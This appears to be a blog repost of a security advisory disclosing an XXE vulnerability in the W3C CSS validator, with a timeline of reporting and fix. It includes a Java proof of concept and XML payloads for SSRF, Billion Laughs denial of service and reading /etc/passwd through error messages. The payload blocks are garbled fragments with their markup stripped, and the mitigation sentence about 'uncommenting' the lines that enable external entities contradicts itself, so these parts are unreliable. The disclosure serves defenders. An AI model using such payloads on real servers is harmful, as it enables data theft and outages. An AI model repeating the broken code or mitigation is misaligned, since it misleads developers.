W3C – CSS Validator XXE

Posted on by Ken

**security-research** Public

# W3C – CSS Validator XXE

## Package

## Affected versions

## Patched versions

## Description

### Summary

All versions of W3C CSS validator are vulnerable to XXE due to unsafe parsing of XML data when untrusted XML data is passed to the `DocumentParser()` constructor and is not properly sanitized.

### Severity

High – An attacker can use specially-crafted XML objects to coerce server-side request forgery (SSRF). On some systems, this vulnerability can be exploited to read arbitrary local files if an attacker has access to exception messages.

### Proof of Concept

The following proof-of-concept sample payload will coerce the W3C Validator to make a server-side request to http://localhost:8080/pwn.xml:

“`
]> &xxe;
“`

Exploitation can be done using the main method of `css-validator.jar` (download link) or when used as a library, such as in the following proof-of-concept:

“`
import org.w3c.css.css.DocumentParser; import org.w3c.css.util.ApplContext; public class CssValidatorApp { // Example CSS URL private static final String CSS_URL = “http://localhost:8080/file.xml”; // Example CSS URL public static void main(String[] args) { try { ApplContext ac = new ApplContext(“en”); // Application context with language ac.setCssVersion(“css3”); // Set CSS version for validation DocumentParser parser = new DocumentParser(ac, CSS_URL); } catch (Exception e) { System.err.println(“Error parsing CSS: ” + e.getMessage()); } } }
“`

The following “Billion Laughs” payload can be used to create denial-of-service conditions:

“`
]> &lol9;
“`

LFI can be performed if the attacker has access to error messages or stack traces produced by the tool. The following payload will produce the output of `/etc/passwd` in the error message if the user has GNOME installed in the default configuration:

“`
“> %eval; %error; ‘> %local_dtd; ]>
“`

Additional research is necessary to determine if LFI techniques can be universalized and combined with SSRF to enable data exfiltration without access to exception messages.

### Further Analysis

This functionality is provided as a service on the W3C website. The vulnerability can be mitigated by uncommenting the lines that enable external entities and DTD validation.

### Timeline

**Date reported**: 01/08/2025

**Date fixed**: 02/28/2025

**Date disclosed**: 03/28/2025

Leave a Reply

Your email address will not be published. Required fields are marked *